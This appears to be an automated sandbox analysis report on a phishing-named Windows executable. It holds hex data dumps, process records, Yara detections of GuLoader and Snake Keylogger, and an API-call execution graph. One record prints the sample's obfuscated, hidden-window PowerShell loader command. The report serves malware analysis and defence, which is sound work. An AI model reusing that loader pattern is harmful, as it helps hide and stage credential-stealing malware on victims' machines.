                2024-07-25 01:10:19 UTC8000INData Raw: bb 78 1b b1 ae 57 ed aa a1 76 ad 33 0f bd ed 9a 27 84 9e 80 2f 95 2d 40 29 27 f0 ea 78 2c c0 aa 19 b8 ed 9f 61 7d 46 cc 79 fb 85 43 73 b8 b2 23 6b ca b0 94 d2 db 70 27 c2 93 25 6f 4f 26 76 dc f6 bf 33 13 77 2e c6 a0 f9 8a 85 9a 20 3e cc fd 85 de e5 7e 46 f7 3e a6 76 ad 58 1b c6 91 76 9a 29 57 e0 0a 04 66 6c e3 02 66 1c b1 3e e6 10 39 32 ff 9d 78 39 8d 08 bf 07 09 57 3c cd 5a 91 02 69 75 49 00 0b 8c f2 f9 fb d1 05 eb 87 15 ec f7 01 a3 0d 8b 92 b1 95 cd fa 67 55 6d a9 ef c6 96 7a 18 b9 31 2c b0 1b 8c dd 97 b4 b2 cb 49 93 4e 59 b6 70 42 89 48 1e df 83 a3 f4 09 e6 da be 12 79 bb 2f 6a 3c 6d 6c 63 ee 62 45 04 73 b0 2c f8 f7 d3 22 ea a3 f2 ea f5 51 62 51 6a d0 7b c0 0f ad 5a 9f 24 0e b0 ed d5 86 30 52 5c b7 c5 02 52 de fb 05 ce ae 5f 25 81 2a 2d 38 e6 28 6c c0
                Data Ascii: xWv3'/-@)'x,a}FyCs#kp'%oO&v3w. >~F>vXv)Wflf>92x9W<ZiuIgUmz1,INYpBHy/j<mlcbEs,"QbQj{Z$0R\R_%*-8(l
                2024-07-25 01:10:19 UTC8000INData Raw: b6 80 92 cb 2e 2d 52 f2 c9 ee f2 c3 1d e0 36 70 ca c8 be d7 0a de 19 cf d2 55 71 20 32 ec bb 0e 10 04 64 38 d8 b4 67 79 df 21 de 36 90 31 94 a5 d2 71 0c dc 9c 29 56 ee 4a 51 02 c4 7f 98 3f c7 e0 67 2c 1e 3b dc 70 bf 54 3f 4b aa 72 18 8f 89 9e be 87 ca 01 c8 9c d6 24 54 10 63 72 0f a7 5b 6d 87 fb 7f 8f 03 c8 06 96 43 5b 2b 29 ba 0e 77 e8 12 ef 96 c1 63 37 5e 3e 91 b9 b3 14 e1 c6 80 72 ec 6c 0b 58 38 3b 44 0e 25 4d 56 c5 9e 32 f6 3f 06 59 28 e8 52 f8 86 9b 6d 80 0f 37 b7 5a 65 b1 43 67 41 22 2f 77 a8 2c ef 56 a2 08 27 f6 74 45 ef c8 43 c5 2e 09 19 bd 3f 73 d3 c8 61 99 7a b8 be 5a 6c 42 fd b0 6f b9 48 32 eb 23 0b 64 5e 3e 4b 60 02 64 37 09 21 78 60 d1 5a c5 8e 05 4a e0 1c c5 f6 9e 92 66 64 3e 84 a7 ea 64 16 81 27 86 30 cf c1 1f cd c6 25 93 ea 8b b4 e6 e3 a1
                Data Ascii: .-R6pUq 2d8gy!61q)VJQ?g,;pT?Kr$Tcr[mC[+)wc7^>rlX8;D%MV2?Y(Rm7ZeCgA"/w,V'tEC.?sazZlBoH2#d^>K`d7!x`ZJfd>d'0%
                2024-07-25 01:10:19 UTC8000INData Raw: 41 b4 5d 47 35 a3 60 c6 48 63 d2 1e fd 0b 24 33 29 ba 0a 57 d0 70 90 87 72 81 80 b7 8f 6f e4 f7 06 55 82 91 c7 ef 7d 81 38 47 d6 7f b7 b5 da 16 9d 9a 8e fe 06 91 7f 42 37 54 5d 35 cd 4e cb 3f c2 f8 9b 3f b0 91 5c f3 95 5f 53 c7 4c d5 a4 54 eb 96 b2 0a a0 66 18 42 c6 cb 0f db 12 1f 36 fa 04 fe 84 08 47 2d ef 87 e9 9e b6 e9 df 1d 3a e8 86 ff 21 78 ee a6 64 03 75 21 92 d0 f8 71 89 8a 81 b8 e7 c7 4b 1d 59 83 e6 9b 3a a9 bd 0c 93 4f 7d 13 76 2e fe 77 36 78 2d 3d d5 5f 5c c6 2a d6 0d 1e 6e 36 05 21 ec 24 04 9c 47 20 5b 2e 2c 21 42 fb 3f fb 87 2e 83 fb 15 59 dc 17 79 05 5f 19 03 c2 5f a5 e4 40 ea 6a 3f 65 0a dc ac 86 3c 10 b2 56 0a d2 9a 6b 56 31 f6 ba 1b c5 c6 d0 f4 65 9f 3d f8 5f 5b 21 ee b7 50 25 29 2c 10 a8 ad b5 61 88 32 c2 e4 75 25 de 8c bf 5b e8 3c 5f bc
                Data Ascii: A]G5`Hc$3)WproU}8GB7T]5N??\_SLTfB6G-:!xdu!qKY:O}v.w6x-=_\*n6!$G [.,!B?.Yy__@j?e<VkV1e=_[!P%),a2u%[<_
                2024-07-25 01:10:19 UTC8000INData Raw: ed eb 00 d2 48 26 ee d5 d7 30 f7 19 25 b0 34 3b a1 a9 2e 71 d2 90 ed 81 63 77 60 25 a6 5d 72 9c 56 42 07 a7 d4 25 11 8d 00 16 03 cf 67 d6 47 c7 31 a6 79 57 ff db cd 95 fa f7 2d b4 6a 15 e2 ce 2c 93 ef 33 2d 9d 78 a2 fd 09 99 78 33 9e 6b 9f aa 34 50 45 78 ed 84 8e e6 14 de 37 ca 7e 71 20 b2 0f 83 78 32 76 ab 2d 47 c8 bf fe 6a a6 ea 76 83 fa 1e 46 e0 24 24 c2 59 0e 79 00 54 94 9a ad a1 b1 72 a7 2d ef ea c5 45 60 30 87 9a 5d 12 e9 32 fb e8 9b 8b 4e 00 89 a5 b7 34 1c 6f 81 6c f7 7a d8 4b 86 ef c6 8c 76 18 1b 56 df d2 81 10 9a f6 7d 52 73 5b cf 6a f0 8c b8 aa e3 35 28 00 1b 68 c4 63 17 bb 52 ed c1 36 c9 1b 38 d1 c7 de b6 75 f4 e2 ae f5 cc 7d 73 8f cc 31 90 77 f3 9b 31 18 fb 56 76 f5 4a a5 2a e2 49 fd d2 90 b0 75 dd d6 73 d6 8d 30 6f c8 70 e9 92 9e 2d 12 80 10
                Data Ascii: H&0%4;.qcw`%]rVB%gG1yW-j,3-xx3k4PEx7~q x2v-GjvF$$YyTr-E`0]2N4olzKvV}Rs[j5(hcR68u}s1w1VvJ*Ius0op-
                2024-07-25 01:10:19 UTC8000INData Raw: cb 36 fd 6e fb 12 cb d9 f4 52 9f 02 d3 d8 a4 15 11 91 ff 43 fc 12 fd 42 ba 5a 08 d6 77 42 98 f4 b3 17 8f 48 b9 2a 86 ea bf a6 c3 ae 3c e8 61 85 9b 2b 70 29 82 22 75 90 a6 94 2b 00 b5 5e 40 e7 5d 69 2a 4a 50 57 7a 9b ca e8 51 8a c1 d8 b7 c7 4e 7e 36 65 05 bf c8 3a 57 56 10 2d 3e 7e e7 bd 63 f3 ac af f3 7b 93 3a 94 11 d7 7f f0 df 84 2a 06 01 52 75 26 4b 3b 6c 86 73 b7 d8 85 85 c0 9c 7f aa 5c d1 10 0d 6c bb 29 8c 3a d9 f7 de 26 6a 96 86 b7 c1 c9 39 cd 86 35 e7 b9 a6 d6 8a 33 0f b9 82 b9 0f cd 9a f2 13 04 0a 30 3f 0b 78 ea 69 21 c1 82 0b ac f7 89 7b 42 41 74 87 04 7a 57 8d 60 9f 06 43 f8 c3 53 d8 c8 74 0f 22 f1 25 65 45 8b bf dc dc b5 61 03 66 22 b8 9a f9 8a 92 e9 ea 3e b2 f6 ea 15 74 7f 4c f7 3f aa 19 61 1d 1b cc ee 50 aa 2c 53 2c c6 04 66 5d e3 13 7b 6e 56
                Data Ascii: 6nRCBZwBH*<a+p)"u+^@]i*JPWzQN~6e:WV->~c{:*Ru&K;ls\l):&j9530?xi!{BAtzW`CSt"%eEaf">tL?aP,S,f]{nV
                2024-07-25 01:10:19 UTC8000INData Raw: 4d bc a3 ef 81 1f e3 8b 18 45 d4 27 0a 40 2b b4 57 29 3e 1c fb fa 5d ea ec 5e d0 9d b9 02 5d 51 ad 4d 70 1e 0b 83 99 d9 0e 8a aa e4 3b d9 06 e5 1b 8f 97 73 78 1a 56 cb 8c 28 26 20 b1 dc f5 02 d7 d6 4c 2c 67 d1 3c d7 39 27 8c 82 7b 99 5d d5 3a 84 85 fd d4 d8 1c c0 43 b7 ac c6 1e 21 37 c4 3b 33 a2 8b 4c ff 7c 83 a3 b1 10 6e f7 f5 c6 8a cb 15 28 cb d5 b2 84 71 93 9c 27 f8 15 6b a8 63 8b c0 af a6 b0 87 f7 1a 83 2b dc 19 f5 6f 51 fb 57 3b bd be b6 94 b9 ea bb 51 82 a6 d4 f0 c3 1b a8 3e 61 cc ba 60 99 0a ec 73 e5 d0 e5 77 33 36 16 af 09 62 1e 2b 38 a8 9e 4d 7b de 27 ac 1a df 38 e0 ad c3 8b 7f ec d3 2f 20 81 60 43 02 c2 57 86 3f c7 eb 74 29 0f 3f c1 65 bd 54 85 58 a2 63 e1 a5 ca 98 86 a6 cb 01 87 f3 f4 24 4f 2a 08 51 e7 a7 51 45 84 f9 7f 98 10 c1 0b 12 17 a5 2a
                Data Ascii: ME'@+W)>]^]QMp;sxV(& L,g<9'{]:C!7;3L|n(q'kc+oQW;Q>a`sw36b+8M{'8/ `CW?t)?eTXc$O*QQE*
                2024-07-25 01:10:19 UTC8000INData Raw: 19 15 46 c5 27 63 b6 a0 d2 3d 9f 4d 14 9b b2 79 a1 49 b8 d1 9e 92 60 73 df 24 60 f8 cb ad 05 af af 81 4b 36 fe 9e 65 1d 46 75 85 9f da 0c 02 9c 46 d3 ea b8 00 6a 8e 11 0e 1b 5f 09 3a 10 49 d3 cc 1a e2 78 df e6 f1 a2 47 c4 3c 51 71 1e 7b 7d 6e fb 7a 5e 7f 0a 0a ef d5 4d eb e7 2a 42 bf 08 ae eb c7 80 9b b8 0e d4 98 f7 fa 0b 12 1b 34 52 ca d1 a8 c4 73 42 be 48 11 c2 4a c8 ed df c9 31 b7 b5 82 7b 4a e4 e9 b5 b9 66 d9 16 a2 4a 58 3b c2 81 8a 33 e8 74 5a 44 b5 42 45 4f 5a 97 09 03 08 33 44 77 e2 0b 51 ac 6e ca b9 54 81 fa ce 56 6e bb e0 25 2f b7 b8 c5 9f 6d be 6a 54 d1 63 b2 43 e1 69 8f 96 9f fa 3b d4 10 09 51 54 2d 5b c2 5a b9 aa a0 f0 fa 95 e7 5e 73 51 c0 28 0b 26 03 d3 c7 f2 c6 9e ab 7c e0 65 02 40 aa b1 0d ab b6 29 28 e3 10 54 d3 f8 13 2a b7 e8 b3 3e 9e 93
                Data Ascii: F'c=MyI`s$`K6eFuFj_:IxG<Qq{}nz^M*B4RsBHJ1{JfJX;3tZDBEOZ3DwQnTVn%/mjTcCi;QT-[Z^sQ(&|e@)(T*>


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:21:09:38
                Start date:24/07/2024
                Path:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"
                Imagebase:0x400000
                File size:868'928 bytes
                MD5 hash:BAF114AC8DAB2634A6F9E33CC67C4B33
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:21:09:41
                Start date:24/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
                Imagebase:0x4b0000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1634084936.000000000A494000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:21:09:41
                Start date:24/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:14
                Start time:23:06:52
                Start date:24/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0x920000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:18
                Start time:23:07:02
                Start date:24/07/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532
                Imagebase:0xf80000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:20.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:22.1%
                  Total number of Nodes:1283
                  Total number of Limit Nodes:35
                  execution_graph 3727 404241 lstrcpynW lstrlenW 3728 401d41 GetDC GetDeviceCaps 3729 402b1b 18 API calls 3728->3729 3730 401d5f MulDiv ReleaseDC 3729->3730 3731 402b1b 18 API calls 3730->3731 3732 401d7e 3731->3732 3733 405f0a 18 API calls 3732->3733 3734 401db7 CreateFontIndirectW 3733->3734 3735 4024e6 3734->3735 3736 401a42 3737 402b1b 18 API calls 3736->3737 3738 401a48 3737->3738 3739 402b1b 18 API calls 3738->3739 3740 4019f0 3739->3740 3741 402744 3742 40273f 3741->3742 3742->3741 3743 402754 FindNextFileW 3742->3743 3744 4027a6 3743->3744 3746 40275f 3743->3746 3747 405ee8 lstrcpynW 3744->3747 3747->3746 3755 401cc6 3756 402b1b 18 API calls 3755->3756 3757 401cd9 SetWindowLongW 3756->3757 3758 4029c5 3757->3758 3467 401dc7 3475 402b1b 3467->3475 3469 401dcd 3470 402b1b 18 API calls 3469->3470 3471 401dd6 3470->3471 3472 401de8 EnableWindow 3471->3472 3473 401ddd ShowWindow 3471->3473 3474 4029c5 3472->3474 3473->3474 3476 405f0a 18 API calls 3475->3476 3477 402b2f 3476->3477 3477->3469 3759 4045c8 3760 4045f4 3759->3760 3761 404605 3759->3761 3820 4056a8 GetDlgItemTextW 3760->3820 3763 404611 GetDlgItem 3761->3763 3769 404670 3761->3769 3766 404625 3763->3766 3764 404754 3768 4048f5 3764->3768 3822 4056a8 GetDlgItemTextW 3764->3822 3765 4045ff 3767 40617c 5 API calls 3765->3767 3771 404639 SetWindowTextW 3766->3771 3772 4059de 4 API calls 3766->3772 3767->3761 3776 404194 8 API calls 3768->3776 3769->3764 3769->3768 3773 405f0a 18 API calls 3769->3773 3775 40412d 19 API calls 3771->3775 3777 40462f 3772->3777 3778 4046e4 SHBrowseForFolderW 3773->3778 3774 404784 3779 405a3b 18 API calls 3774->3779 3780 404655 3775->3780 3781 404909 3776->3781 3777->3771 3785 405933 3 API calls 3777->3785 3778->3764 3782 4046fc CoTaskMemFree 3778->3782 3783 40478a 3779->3783 3784 40412d 19 API calls 3780->3784 3786 405933 3 API calls 3782->3786 3823 405ee8 lstrcpynW 3783->3823 3787 404663 3784->3787 3785->3771 3788 404709 3786->3788 3821 404162 SendMessageW 3787->3821 3791 404740 SetDlgItemTextW 3788->3791 3796 405f0a 18 API calls 3788->3796 3791->3764 3792 404669 3794 406252 3 API calls 3792->3794 3793 4047a1 3795 406252 3 API calls 3793->3795 3794->3769 3802 4047a9 3795->3802 3797 404728 lstrcmpiW 3796->3797 3797->3791 3800 404739 lstrcatW 3797->3800 3798 4047e8 3824 405ee8 lstrcpynW 3798->3824 3800->3791 3801 4047ef 3803 4059de 4 API calls 3801->3803 3802->3798 3806 40597f 2 API calls 3802->3806 3808 40483a 3802->3808 3804 4047f5 GetDiskFreeSpaceW 3803->3804 3807 404818 MulDiv 3804->3807 3804->3808 3806->3802 3807->3808 3809 4048a4 3808->3809 3825 404976 3808->3825 3810 4048c7 3809->3810 3812 40140b 2 API calls 3809->3812 3833 40414f KiUserCallbackDispatcher 3810->3833 3812->3810 3813 404896 3815 4048a6 SetDlgItemTextW 3813->3815 3816 40489b 3813->3816 3815->3809 3818 404976 21 API calls 3816->3818 3817 4048e3 3817->3768 3834 40455d 3817->3834 3818->3809 3820->3765 3821->3792 3822->3774 3823->3793 3824->3801 3826 404993 3825->3826 3827 405f0a 18 API calls 3826->3827 3828 4049c8 3827->3828 3829 405f0a 18 API calls 3828->3829 3830 4049d3 3829->3830 3831 405f0a 18 API calls 3830->3831 3832 404a04 lstrlenW wsprintfW SetDlgItemTextW 3831->3832 3832->3813 3833->3817 3835 404570 SendMessageW 3834->3835 3836 40456b 3834->3836 3835->3768 3836->3835 3837 4042ca 3838 4042e2 3837->3838 3842 4043fc 3837->3842 3843 40412d 19 API calls 3838->3843 3839 404466 3840 404538 3839->3840 3841 404470 GetDlgItem 3839->3841 3848 404194 8 API calls 3840->3848 3844 4044f9 3841->3844 3845 40448a 3841->3845 3842->3839 3842->3840 3846 404437 GetDlgItem SendMessageW 3842->3846 3847 404349 3843->3847 3844->3840 3852 40450b 3844->3852 3845->3844 3851 4044b0 6 API calls 3845->3851 3868 40414f KiUserCallbackDispatcher 3846->3868 3850 40412d 19 API calls 3847->3850 3857 404533 3848->3857 3854 404356 CheckDlgButton 3850->3854 3851->3844 3855 404521 3852->3855 3856 404511 SendMessageW 3852->3856 3853 404461 3859 40455d SendMessageW 3853->3859 3866 40414f KiUserCallbackDispatcher 3854->3866 3855->3857 3858 404527 SendMessageW 3855->3858 3856->3855 3858->3857 3859->3839 3861 404374 GetDlgItem 3867 404162 SendMessageW 3861->3867 3863 40438a SendMessageW 3864 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3863->3864 3865 4043a7 GetSysColor 3863->3865 3864->3857 3865->3864 3866->3861 3867->3863 3868->3853 3869 401bca 3870 402b1b 18 API calls 3869->3870 3871 401bd1 3870->3871 3872 402b1b 18 API calls 3871->3872 3873 401bdb 3872->3873 3874 401beb 3873->3874 3876 402b38 18 API calls 3873->3876 3875 401bfb 3874->3875 3877 402b38 18 API calls 3874->3877 3878 401c06 3875->3878 3879 401c4a 3875->3879 3876->3874 3877->3875 3880 402b1b 18 API calls 3878->3880 3881 402b38 18 API calls 3879->3881 3882 401c0b 3880->3882 3883 401c4f 3881->3883 3885 402b1b 18 API calls 3882->3885 3884 402b38 18 API calls 3883->3884 3886 401c58 FindWindowExW 3884->3886 3887 401c14 3885->3887 3890 401c7a 3886->3890 3888 401c3a SendMessageW 3887->3888 3889 401c1c SendMessageTimeoutW 3887->3889 3888->3890 3889->3890 3891 4024ca 3892 402b38 18 API calls 3891->3892 3893 4024d1 3892->3893 3896 405b54 GetFileAttributesW CreateFileW 3893->3896 3895 4024dd 3896->3895 3897 40194b 3898 402b1b 18 API calls 3897->3898 3899 401952 3898->3899 3900 402b1b 18 API calls 3899->3900 3901 40195c 3900->3901 3902 402b38 18 API calls 3901->3902 3903 401965 3902->3903 3904 401979 lstrlenW 3903->3904 3905 4019b5 3903->3905 3906 401983 3904->3906 3906->3905 3910 405ee8 lstrcpynW 3906->3910 3908 40199e 3908->3905 3909 4019ab lstrlenW 3908->3909 3909->3905 3910->3908 3914 4019cf 3915 402b38 18 API calls 3914->3915 3916 4019d6 3915->3916 3917 402b38 18 API calls 3916->3917 3918 4019df 3917->3918 3919 4019e6 lstrcmpiW 3918->3919 3920 4019f8 lstrcmpW 3918->3920 3921 4019ec 3919->3921 3920->3921 2966 401e51 2984 402b38 2966->2984 2973 401ec6 CloseHandle 2977 402791 2973->2977 2974 401e77 WaitForSingleObject 2975 401e89 2974->2975 2976 401e9b GetExitCodeProcess 2975->2976 3004 40628b 2975->3004 2978 401eba 2976->2978 2979 401ead 2976->2979 2978->2973 2982 401eb8 2978->2982 3008 405e2f wsprintfW 2979->3008 2982->2973 2985 402b44 2984->2985 3009 405f0a 2985->3009 2988 401e57 2990 405192 2988->2990 2991 4051ad 2990->2991 3000 401e61 2990->3000 2992 4051c9 lstrlenW 2991->2992 2993 405f0a 18 API calls 2991->2993 2994 4051f2 2992->2994 2995 4051d7 lstrlenW 2992->2995 2993->2992 2997 405205 2994->2997 2998 4051f8 SetWindowTextW 2994->2998 2996 4051e9 lstrcatW 2995->2996 2995->3000 2996->2994 2999 40520b SendMessageW SendMessageW SendMessageW 2997->2999 2997->3000 2998->2997 2999->3000 3001 405663 CreateProcessW 3000->3001 3002 405692 CloseHandle 3001->3002 3003 401e67 3001->3003 3002->3003 3003->2973 3003->2974 3003->2977 3005 4062a8 PeekMessageW 3004->3005 3006 401e90 WaitForSingleObject 3005->3006 3007 40629e DispatchMessageW 3005->3007 3006->2975 3007->3005 3008->2982 3014 405f17 3009->3014 3010 406162 3011 402b65 3010->3011 3043 405ee8 lstrcpynW 3010->3043 3011->2988 3027 40617c 3011->3027 3013 405fca GetVersion 3013->3014 3014->3010 3014->3013 3015 406130 lstrlenW 3014->3015 3018 405f0a 10 API calls 3014->3018 3020 406045 GetSystemDirectoryW 3014->3020 3021 406058 GetWindowsDirectoryW 3014->3021 3022 40617c 5 API calls 3014->3022 3023 40608c SHGetSpecialFolderLocation 3014->3023 3024 405f0a 10 API calls 3014->3024 3025 4060d1 lstrcatW 3014->3025 3036 405db5 RegOpenKeyExW 3014->3036 3041 405e2f wsprintfW 3014->3041 3042 405ee8 lstrcpynW 3014->3042 3015->3014 3018->3015 3020->3014 3021->3014 3022->3014 3023->3014 3026 4060a4 SHGetPathFromIDListW CoTaskMemFree 3023->3026 3024->3014 3025->3014 3026->3014 3033 406189 3027->3033 3028 406204 CharPrevW 3031 4061ff 3028->3031 3029 4061f2 CharNextW 3029->3031 3029->3033 3031->3028 3032 406225 3031->3032 3032->2988 3033->3029 3033->3031 3034 4061de CharNextW 3033->3034 3035 4061ed CharNextW 3033->3035 3044 405960 3033->3044 3034->3033 3035->3029 3037 405e29 3036->3037 3038 405de9 RegQueryValueExW 3036->3038 3037->3014 3039 405e0a RegCloseKey 3038->3039 3039->3037 3041->3014 3042->3014 3043->3011 3045 405966 3044->3045 3046 40597c 3045->3046 3047 40596d CharNextW 3045->3047 3046->3033 3047->3045 3048 4052d1 3049 4052f2 GetDlgItem GetDlgItem GetDlgItem 3048->3049 3050 40547d 3048->3050 3093 404162 SendMessageW 3049->3093 3052 405486 GetDlgItem CreateThread FindCloseChangeNotification 3050->3052 3053 4054ae 3050->3053 3052->3053 3116 405265 OleInitialize 3052->3116 3055 4054d9 3053->3055 3057 4054c5 ShowWindow ShowWindow 3053->3057 3058 4054fe 3053->3058 3054 405363 3063 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3054->3063 3056 405539 3055->3056 3060 405513 ShowWindow 3055->3060 3061 4054ed 3055->3061 3056->3058 3069 405547 SendMessageW 3056->3069 3098 404162 SendMessageW 3057->3098 3102 404194 3058->3102 3065 405533 3060->3065 3066 405525 3060->3066 3099 404106 3061->3099 3067 4053d9 3063->3067 3068 4053bd SendMessageW SendMessageW 3063->3068 3075 404106 SendMessageW 3065->3075 3074 405192 25 API calls 3066->3074 3070 4053ec 3067->3070 3071 4053de SendMessageW 3067->3071 3068->3067 3072 405560 CreatePopupMenu 3069->3072 3073 40550c 3069->3073 3094 40412d 3070->3094 3071->3070 3076 405f0a 18 API calls 3072->3076 3074->3065 3075->3056 3078 405570 AppendMenuW 3076->3078 3080 4055a0 TrackPopupMenu 3078->3080 3081 40558d GetWindowRect 3078->3081 3079 4053fc 3082 405405 ShowWindow 3079->3082 3083 405439 GetDlgItem SendMessageW 3079->3083 3080->3073 3084 4055bb 3080->3084 3081->3080 3085 405428 3082->3085 3086 40541b ShowWindow 3082->3086 3083->3073 3087 405460 SendMessageW SendMessageW 3083->3087 3088 4055d7 SendMessageW 3084->3088 3097 404162 SendMessageW 3085->3097 3086->3085 3087->3073 3088->3088 3089 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3088->3089 3091 405619 SendMessageW 3089->3091 3091->3091 3092 405642 GlobalUnlock SetClipboardData CloseClipboard 3091->3092 3092->3073 3093->3054 3095 405f0a 18 API calls 3094->3095 3096 404138 SetDlgItemTextW 3095->3096 3096->3079 3097->3083 3098->3055 3100 404113 SendMessageW 3099->3100 3101 40410d 3099->3101 3100->3058 3101->3100 3103 4041ac GetWindowLongW 3102->3103 3113 404235 3102->3113 3104 4041bd 3103->3104 3103->3113 3105 4041cc GetSysColor 3104->3105 3106 4041cf 3104->3106 3105->3106 3107 4041d5 SetTextColor 3106->3107 3108 4041df SetBkMode 3106->3108 3107->3108 3109 4041f7 GetSysColor 3108->3109 3110 4041fd 3108->3110 3109->3110 3111 404204 SetBkColor 3110->3111 3112 40420e 3110->3112 3111->3112 3112->3113 3114 404221 DeleteObject 3112->3114 3115 404228 CreateBrushIndirect 3112->3115 3113->3073 3114->3115 3115->3113 3123 404179 3116->3123 3118 404179 SendMessageW 3119 4052c1 OleUninitialize 3118->3119 3120 405288 3122 4052af 3120->3122 3126 401389 3120->3126 3122->3118 3124 404191 3123->3124 3125 404182 SendMessageW 3123->3125 3124->3120 3125->3124 3127 401390 3126->3127 3128 4013fe 3127->3128 3129 4013cb MulDiv SendMessageW 3127->3129 3128->3120 3129->3127 3922 402251 3923 40225f 3922->3923 3924 402259 3922->3924 3926 40226d 3923->3926 3927 402b38 18 API calls 3923->3927 3925 402b38 18 API calls 3924->3925 3925->3923 3928 402b38 18 API calls 3926->3928 3930 40227b 3926->3930 3927->3926 3928->3930 3929 402b38 18 API calls 3931 402284 WritePrivateProfileStringW 3929->3931 3930->3929 3130 401752 3131 402b38 18 API calls 3130->3131 3132 401759 3131->3132 3133 401781 3132->3133 3134 401779 3132->3134 3188 405ee8 lstrcpynW 3133->3188 3187 405ee8 lstrcpynW 3134->3187 3137 40177f 3141 40617c 5 API calls 3137->3141 3138 40178c 3189 405933 lstrlenW CharPrevW 3138->3189 3166 40179e 3141->3166 3145 4017b0 CompareFileTime 3145->3166 3146 401870 3148 405192 25 API calls 3146->3148 3147 401847 3149 405192 25 API calls 3147->3149 3158 40185c 3147->3158 3151 40187a 3148->3151 3149->3158 3150 405ee8 lstrcpynW 3150->3166 3172 403060 3151->3172 3154 4018a1 SetFileTime 3155 4018b3 FindCloseChangeNotification 3154->3155 3157 4018c4 3155->3157 3155->3158 3156 405f0a 18 API calls 3156->3166 3159 4018c9 3157->3159 3160 4018dc 3157->3160 3161 405f0a 18 API calls 3159->3161 3162 405f0a 18 API calls 3160->3162 3164 4018d1 lstrcatW 3161->3164 3165 4018e4 3162->3165 3164->3165 3167 4056c4 MessageBoxIndirectW 3165->3167 3166->3145 3166->3146 3166->3147 3166->3150 3166->3156 3168 405b2f GetFileAttributesW 3166->3168 3171 405b54 GetFileAttributesW CreateFileW 3166->3171 3192 40622b FindFirstFileW 3166->3192 3195 4056c4 3166->3195 3167->3158 3169 405b41 SetFileAttributesW 3168->3169 3170 405b4e 3168->3170 3169->3170 3170->3166 3171->3166 3173 403070 SetFilePointer 3172->3173 3174 40308c 3172->3174 3173->3174 3199 40317b GetTickCount 3174->3199 3179 40317b 43 API calls 3180 4030c3 3179->3180 3181 40313d ReadFile 3180->3181 3183 40188d 3180->3183 3186 4030d3 3180->3186 3181->3183 3183->3154 3183->3155 3184 405bd7 ReadFile 3184->3186 3185 403106 WriteFile 3185->3183 3185->3186 3186->3183 3186->3184 3186->3185 3187->3137 3188->3138 3190 401792 lstrcatW 3189->3190 3191 40594f lstrcatW 3189->3191 3190->3137 3191->3190 3193 406241 FindClose 3192->3193 3194 40624c 3192->3194 3193->3194 3194->3166 3196 4056d9 3195->3196 3197 405725 3196->3197 3198 4056ed MessageBoxIndirectW 3196->3198 3197->3166 3198->3197 3200 4032e5 3199->3200 3201 4031aa 3199->3201 3202 402d18 33 API calls 3200->3202 3214 40330d SetFilePointer 3201->3214 3208 403093 3202->3208 3204 4031b5 SetFilePointer 3209 4031da 3204->3209 3208->3183 3212 405bd7 ReadFile 3208->3212 3209->3208 3210 40326f WriteFile 3209->3210 3211 4032c6 SetFilePointer 3209->3211 3215 4032f7 3209->3215 3218 40638e 3209->3218 3225 402d18 3209->3225 3210->3208 3210->3209 3211->3200 3213 4030ac 3212->3213 3213->3179 3213->3183 3214->3204 3216 405bd7 ReadFile 3215->3216 3217 40330a 3216->3217 3217->3209 3219 4063b3 3218->3219 3220 4063bb 3218->3220 3219->3209 3220->3219 3221 406442 GlobalFree 3220->3221 3222 40644b GlobalAlloc 3220->3222 3223 4064c2 GlobalAlloc 3220->3223 3224 4064b9 GlobalFree 3220->3224 3221->3222 3222->3219 3222->3220 3223->3219 3223->3220 3224->3223 3226 402d41 3225->3226 3227 402d29 3225->3227 3230 402d51 GetTickCount 3226->3230 3231 402d49 3226->3231 3228 402d32 DestroyWindow 3227->3228 3229 402d39 3227->3229 3228->3229 3229->3209 3230->3229 3233 402d5f 3230->3233 3232 40628b 2 API calls 3231->3232 3232->3229 3234 402d94 CreateDialogParamW ShowWindow 3233->3234 3235 402d67 3233->3235 3234->3229 